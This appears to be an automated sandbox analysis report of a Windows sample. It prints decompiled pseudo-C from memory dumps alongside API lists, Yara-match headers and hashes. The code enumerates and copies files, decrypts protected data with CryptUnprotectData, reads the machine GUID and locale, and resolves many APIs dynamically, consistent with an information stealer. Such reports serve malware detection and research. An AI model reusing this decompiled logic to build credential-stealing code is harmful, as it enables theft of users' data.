                            				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                            				_v117 = _v117 + __edx;
                            				_t147 = _t148;
                            				_t149 = _t148 + 0xfffffd74;
                            				_push(_t115);
                            				_push(__esi);
                            				_push(__edi);
                            				_v632 = 0;
                            				_v636 = 0;
                            				_v648 = 0;
                            				_v652 = 0;
                            				_v656 = 0;
                            				_v640 = 0;
                            				_v644 = 0;
                            				_v624 = 0;
                            				_v628 = 0;
                            				_v620 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				_push(_t147);
                            				_push(0x411c11);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t149;
                            				E00403E14( &_v620, L"\\*.*", _v8, 0);
                            				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
                            				do {
                            					_push(_v8);
                            					_push(0x411c38);
                            					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
                            					_push(_v628);
                            					_push(0x411c38);
                            					_t74 =  *0x41b3bc; // 0x41c80c
                            					_push( *_t74);
                            					E00403E78();
                            					if(E0040776C(_v624, 0, 0x104) != 0) {
                            						_push(_t147);
                            						_push(0x411b85);
                            						_push( *[fs:eax]);
                            						 *[fs:eax] = _t149;
                            						_push(_v8);
                            						_push(0x411c38);
                            						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
                            						_push(_v644);
                            						_push(0x411c38);
                            						_t99 =  *0x41b3bc; // 0x41c80c
                            						_push( *_t99);
                            						E00403E78();
                            						E00410D88(_v640, 0,  &_v636, _t144, _t145);
                            						E0040377C( &_v632, _v636);
                            						_push(_v632);
                            						_push(_v16);
                            						_push(0x411c38);
                            						_push(_v12);
                            						_push(E00411C40);
                            						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
                            						_push(_v656);
                            						_push(L".txt");
                            						E00403E78();
                            						E0040377C( &_v648, _v652);
                            						_pop(_t111);
                            						E0040E6D4(_t111, 0, _v648, _t144, _t145);
                            						_pop(_t143);
                            						 *[fs:eax] = _t143;
                            					}
                            				} while (FindNextFileW(_v24,  &_v616) != 0);
                            				FindClose(_v24);
                            				_pop(_t130);
                            				 *[fs:eax] = _t130;
                            				_push(E00411C18);
                            				E00403BF4( &_v656, 2);
                            				E004034E4( &_v648);
                            				E00403BF4( &_v644, 3);
                            				E004034E4( &_v632);
                            				E00403BF4( &_v628, 3);
                            				return E00403BF4( &_v16, 3);
                            			}

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                              • Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                            • String ID: .txt$\*.*
                            • API String ID: 3908936366-2615687548
                            • Opcode ID: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
                            • Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
                            • Opcode Fuzzy Hash: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
                            • Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E004119AC(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v24;
                            				struct _WIN32_FIND_DATAW _v616;
                            				char _v620;
                            				char _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				char _v640;
                            				char _v644;
                            				char _v648;
                            				char _v652;
                            				char _v656;
                            				intOrPtr* _t72;
                            				intOrPtr* _t97;
                            				void* _t109;
                            				intOrPtr _t127;
                            				intOrPtr _t140;
                            				void* _t144;
                            				void* _t145;
                            				intOrPtr _t146;
                            
                            				_t142 = __esi;
                            				_t141 = __edi;
                            				_t144 = _t145;
                            				_t146 = _t145 + 0xfffffd74;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v632 = 0;
                            				_v636 = 0;
                            				_v648 = 0;
                            				_v652 = 0;
                            				_v656 = 0;
                            				_v640 = 0;
                            				_v644 = 0;
                            				_v624 = 0;
                            				_v628 = 0;
                            				_v620 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				_push(_t144);
                            				_push(0x411c11);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t146;
                            				E00403E14( &_v620, L"\\*.*", _v8, 0);
                            				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
                            				do {
                            					_push(_v8);
                            					_push(0x411c38);
                            					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
                            					_push(_v628);
                            					_push(0x411c38);
                            					_t72 =  *0x41b3bc; // 0x41c80c
                            					_push( *_t72);
                            					E00403E78();
                            					if(E0040776C(_v624, 0, 0x104) != 0) {
                            						_push(_t144);
                            						_push(0x411b85);
                            						_push( *[fs:eax]);
                            						 *[fs:eax] = _t146;
                            						_push(_v8);
                            						_push(0x411c38);
                            						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
                            						_push(_v644);
                            						_push(0x411c38);
                            						_t97 =  *0x41b3bc; // 0x41c80c
                            						_push( *_t97);
                            						E00403E78();
                            						E00410D88(_v640, 0,  &_v636, _t141, _t142);
                            						E0040377C( &_v632, _v636);
                            						_push(_v632);
                            						_push(_v16);
                            						_push(0x411c38);
                            						_push(_v12);
                            						_push(E00411C40);
                            						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
                            						_push(_v656);
                            						_push(L".txt");
                            						E00403E78();
                            						E0040377C( &_v648, _v652);
                            						_pop(_t109);
                            						E0040E6D4(_t109, 0, _v648, _t141, _t142);
                            						_pop(_t140);
                            						 *[fs:eax] = _t140;
                            					}
                            				} while (FindNextFileW(_v24,  &_v616) != 0);
                            				FindClose(_v24);
                            				_pop(_t127);
                            				 *[fs:eax] = _t127;
                            				_push(E00411C18);
                            				E00403BF4( &_v656, 2);
                            				E004034E4( &_v648);
                            				E00403BF4( &_v644, 3);
                            				E004034E4( &_v632);
                            				E00403BF4( &_v628, 3);
                            				return E00403BF4( &_v16, 3);
                            			}
                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                              • Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                            • String ID: .txt$\*.*
                            • API String ID: 3908936366-2615687548
                            • Opcode ID: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
                            • Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
                            • Opcode Fuzzy Hash: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
                            • Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E0040A610(intOrPtr __eax, void* __ecx, char __edx) {
                            				char _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				void* _v36;
                            				intOrPtr _v40;
                            
                            				_t19 = __ecx;
                            				_v20 = __edx;
                            				_v16 = __eax;
                            				_push( &_v12);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push( &_v20);
                            				if( *0x41ca64() == 0) {
                            					return E00403538(__ecx, E0040A678);
                            				}
                            				E004036DC(__ecx, _v36);
                            				E00403B1C(_t19, _v40);
                            				return LocalFree(_v36);
                            			}
                            APIs
                            • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
                            • LocalFree.KERNEL32(?), ref: 0040A656
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CryptDataFreeLocalUnprotect
                            • String ID:
                            • API String ID: 1561624719-0
                            • Opcode ID: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
                            • Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
                            • Opcode Fuzzy Hash: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
                            • Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: $a
                            • API String ID: 0-206647194
                            • Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
                            • Instruction ID: 4fd98cce1c05c289d1c38523d6e74cf079a843006d5b417f1885a5d5d51f159c
                            • Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
                            • Instruction Fuzzy Hash: 36C167716083018FC724CF64C494A2BB7E2FF98704F158A6EE4869B352E775E849CF5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E00404BA8(int __eax, void* __ebx, void* __eflags) {
                            				char _v8;
                            				char _v15;
                            				char _v20;
                            				intOrPtr _t29;
                            				void* _t32;
                            
                            				_v20 = 0;
                            				_push(_t32);
                            				_push(0x404c0e);
                            				_push( *[fs:edx]);
                            				 *[fs:edx] = _t32 + 0xfffffff0;
                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                            				E00403748( &_v20, 7,  &_v15);
                            				E00402988(_v20,  &_v8);
                            				if(_v8 != 0) {
                            				}
                            				_pop(_t29);
                            				 *[fs:eax] = _t29;
                            				_push(E00404C15);
                            				return E004034E4( &_v20);
                            			}
                            APIs
                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
                            • Instruction ID: 4cf5545a5668d2b6934dff5f8e722f533bd1fe9dd63670d657e80fcd03084d14
                            • Opcode Fuzzy Hash: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
                            • Instruction Fuzzy Hash: 77F0C870A0420DAFE715DF91CD41ADEF77AF7C5714F50883AA610772D0E7B86A00C698
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: .dll
                            • API String ID: 0-2738580789
                            • Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
                            • Instruction ID: 73c0c16251436177f02bf79306a052536ebe9c04f4cc192ccf478af3a02a3547
                            • Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
                            • Instruction Fuzzy Hash: 96518FB0900619DBCB28CF95C580ABFB7B1FF04705F10866ED4459B341E378AA84CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: .dll
                            • API String ID: 0-2738580789
                            • Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
                            • Instruction ID: 657b4ad320a9e24a1069f8140d57c8fce872b2e636b3131ed58fa8d60178c7dd
                            • Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
                            • Instruction Fuzzy Hash: 33518C30E00219EFCB24CF55C4806AEB7B1FF2A305F10816ED945AB741D778AA85CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00407AF0() {
                            
                            				return  *[fs:0x30];
                            			}
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                            • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00405668() {
                            				struct HINSTANCE__* _t108;
                            				struct HINSTANCE__* _t110;
                            				struct HINSTANCE__* _t112;
                            				struct HINSTANCE__* _t115;
                            				struct HINSTANCE__* _t118;
                            				_Unknown_base(*)()* _t119;
                            
                            				 *0x41c678 = LoadLibraryA("kernel32.dll");
                            				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
                            				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
                            				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
                            				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
                            				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
                            				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
                            				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
                            				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
                            				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
                            				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
                            				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
                            				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
                            				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
                            				 *0x41c6b0 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
                            				 *0x41c6b4 = GetProcAddress( *0x41c678, "FindFirstFileW");
                            				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindNextFileW");
                            				 *0x41c6bc = GetProcAddress( *0x41c678, "LocalFree");
                            				 *0x41c6c0 = GetProcAddress( *0x41c678, "GetTickCount");
                            				 *0x41c6c4 = GetProcAddress( *0x41c678, "CopyFileW");
                            				 *0x41c6c8 = GetProcAddress( *0x41c678, "FindClose");
                            				 *0x41c6cc = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
                            				 *0x41c6d0 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
                            				 *0x41c6d4 = GetProcAddress( *0x41c678, "Process32FirstW");
                            				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32NextW");
                            				 *0x41c6dc = GetProcAddress( *0x41c678, "GetModuleFileNameW");
                            				 *0x41c6e0 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
                            				 *0x41c6e4 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
                            				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocalTime");
                            				 *0x41c6ec = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
                            				 *0x41c6f0 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
                            				 *0x41c6f4 = GetProcAddress( *0x41c678, "DeleteFileW");
                            				 *0x41c6f8 = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
                            				 *0x41c6fc = GetProcAddress( *0x41c678, "GetDriveTypeA");
                            				 *0x41c700 = GetProcAddress( *0x41c678, "CreateProcessW");
                            				 *0x41c704 = LoadLibraryA("advapi32.dll");
                            				 *0x41c708 = GetProcAddress( *0x41c704, "GetUserNameW");
                            				 *0x41c70c = GetProcAddress( *0x41c704, "RegCreateKeyExW");
                            				 *0x41c710 = GetProcAddress( *0x41c704, "RegQueryValueExW");
                            				 *0x41c714 = GetProcAddress( *0x41c704, "RegCloseKey");
                            				 *0x41c718 = GetProcAddress( *0x41c704, "RegOpenKeyExW");
                            				 *0x41c71c = GetProcAddress( *0x41c704, "AllocateAndInitializeSid");
                            				 *0x41c720 = GetProcAddress( *0x41c704, "LookupAccountSidA");
                            				 *0x41c724 = GetProcAddress( *0x41c704, "CreateProcessAsUserW");
                            				 *0x41c728 = GetProcAddress( *0x41c704, "CheckTokenMembership");
                            				 *0x41c72c = GetProcAddress( *0x41c704, "RegOpenKeyW");
                            				 *0x41c730 = GetProcAddress( *0x41c704, "RegEnumKeyW");
                            				 *0x41c734 = GetProcAddress( *0x41c704, "RegEnumValueW");
                            				 *0x41c738 = GetProcAddress( *0x41c704, "CryptAcquireContextA");
                            				 *0x41c73c = GetProcAddress( *0x41c704, "CryptCreateHash");
                            				 *0x41c740 = GetProcAddress( *0x41c704, "CryptHashData");
                            				 *0x41c744 = GetProcAddress( *0x41c704, "CryptGetHashParam");
                            				 *0x41c748 = GetProcAddress( *0x41c704, "CryptDestroyHash");
                            				 *0x41c74c = GetProcAddress( *0x41c704, "CryptReleaseContext");
                            				 *0x41c750 = LoadLibraryA("user32.dll");
                            				_t108 =  *0x41c750; // 0x768f0000
                            				 *0x41c754 = GetProcAddress(_t108, "EnumDisplayDevicesW");
                            				_t110 =  *0x41c750; // 0x768f0000
                            				 *0x41c758 = GetProcAddress(_t110, "wvsprintfA");
                            				_t112 =  *0x41c750; // 0x768f0000
                            				 *0x41c75c = GetProcAddress(_t112, "GetKeyboardLayoutList");
                            				 *0x41c760 = LoadLibraryA("shell32.dll");
                            				_t115 =  *0x41c760; // 0x75390000
                            				 *0x41c764 = GetProcAddress(_t115, "ShellExecuteExW");
                            				 *0x41c768 = LoadLibraryA("ntdll.dll");
                            				_t118 =  *0x41c768; // 0x775e0000
                            				_t119 = GetProcAddress(_t118, "RtlComputeCrc32");
                            				 *0x41c76c = _t119;
                            				return _t119;
                            			}
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
                            • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
                            • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
                            • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
                            • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
                            • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
                            • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
                            • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
                            • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
                            • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
                            • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
                            • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
                            • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
                            • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
                            • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
                            • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
                            • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
                            • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
                            • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
                            • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
                            • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
                            • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
                            • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
                            • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
                            • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
                            • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
                            • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
                            • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
                            • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
                            • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
                            • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
                            • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
                            • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
                            • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
                            • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
                            • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
                            • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
                            • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
                            • GetProcAddress.KERNEL32(768F0000,EnumDisplayDevicesW), ref: 00405A4E
                            • GetProcAddress.KERNEL32(768F0000,wvsprintfA), ref: 00405A63
                            • GetProcAddress.KERNEL32(768F0000,GetKeyboardLayoutList), ref: 00405A78
                            • LoadLibraryA.KERNEL32(shell32.dll,768F0000,GetKeyboardLayoutList,768F0000,wvsprintfA,768F0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
                            • GetProcAddress.KERNEL32(75390000,ShellExecuteExW), ref: 00405A9C
                            • LoadLibraryA.KERNEL32(ntdll.dll,75390000,ShellExecuteExW,shell32.dll,768F0000,GetKeyboardLayoutList,768F0000,wvsprintfA,768F0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
                            • GetProcAddress.KERNEL32(775E0000,RtlComputeCrc32), ref: 00405AC0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                            • API String ID: 2238633743-3531362093
                            • Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                            • Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
                            • Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                            • Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00417820(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v432;
                            				intOrPtr _v444;
                            				short _v446;
                            				char _v448;
                            				char _v1472;
                            				char _v1476;
                            				char _v1480;
                            				char _v1484;
                            				char _v1488;
                            				char _v1492;
                            				void* _t144;
                            				void* _t151;
                            				void* _t186;
                            				struct HINSTANCE__* _t196;
                            				void* _t197;
                            				intOrPtr _t206;
                            				void* _t222;
                            				void* _t225;
                            				void* _t228;
                            
                            				_v1476 = 0;
                            				_v1480 = 0;
                            				_v1484 = 0;
                            				_v1488 = 0;
                            				_v1492 = 0;
                            				_v20 = 0;
                            				_v24 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00403980(_v8);
                            				E00403980(_v12);
                            				E00403980(_v16);
                            				E00403980(_a16);
                            				E00403980(_a12);
                            				_push(_t228);
                            				_push(0x417c31);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t228 + 0xfffffa30;
                            				E0040357C( &_v28, "wsock32.dll");
                            				_t196 = GetModuleHandleA(E004039E8( &_v28));
                            				if(_t196 == 0) {
                            					_t196 = LoadLibraryA(E004039E8( &_v28));
